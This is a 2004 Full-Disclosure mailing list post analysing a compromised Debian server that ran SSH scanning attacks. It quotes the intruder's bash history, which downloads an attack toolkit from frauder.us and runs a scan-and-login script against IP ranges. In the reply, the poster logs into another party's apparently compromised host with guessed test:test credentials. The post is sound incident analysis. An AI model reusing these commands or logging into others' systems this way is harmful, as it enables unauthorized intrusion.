What I find interesting is that the file vuln.txt contained a list of IP addresses that seem to have been exploited. I tryed to login to one of them with user/pass test:test
[EMAIL PROTECTED] ssh $ ssh 161.53.223.3 -l test Password: Linux zagreb 2.4.26-grsec #1 SMP Thu Apr 15 17:27:27 CEST 2004 i686 GNU/Linux Connection to 161.53.223.3 closed. On Thu, 29 Jul 2004 18:38:15 +0200, Stefan Janecek <[EMAIL PROTECTED]> wrote: > Hmmm - I have also been getting those login attemps, but thought them to > be harmless. Maybe they are not *that* harmless, though... Today I > managed to get my hands on a machine that was originating such login > attempts. I must admit I am far from being a linux security expert, but > this is what I've found out up to now: > > Whoever broke into the machine did not take any attempts to cover up his > tracks - this is what I found in /root/.bash_history: > > ------ > id > uname -a > w > id > ls > wgte frauder.us/linux/ssh.tgz > wget frauder.us/linux/ssh.tgz > tar xzvf ssh.tgz > tar xvf ssh.tgz > ls > cd ssh > ls > ../go.sh 195.178 > ls > pico uniq.txt > vi uniq.txt > ls > rm -rf uniq.txt > ../go.sh 167.205 > ls > rm -rf uniq.txt vuln.txt > ../go.sh 202.148.20 > ../go.sh 212.92 > ../go.sh 195.197 > ../go.sh 147.32 > ../go.sh 213.168 > ../go.sh 134.176 > ../go.sh 195.83 > ------ > > um-hum. I downloaded 'ssh.tgz', it contains the script go.sh and two > binaries: > > go.sh: > ------- > ../ss 22 -b $1 -i eth0 -s 6 > cat bios.txt |sort | uniq > uniq.txt > ../sshf > ------- > > * 'ss' apparently is some sort of portscanner > * 'sshf' connects to every IP in uniq.txt and tries to log in as user > 'test' first, then as user 'guest' (according to tcpdump). > > This does not seem to be a stupid brute force attack, as there is only > one login attempt per user. Could it be that the tool tries to exploit > some vulnerability in the sshd, and just tries to look harmless by using > 'test' and 'guest' as usernames? > > The compromised machine was running an old debian woody installation > which had not been upgraded for at least one year, the sshd version > string says 'OpenSSH_3.6.1p2 Debian 1:3.6.1p2-10' > > As already mentioned, I am far from being an expert, but if I can assist > in further testing, then let me know. Please CC me, I am not subscribed > to the list. > > cheers, > Stefan > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html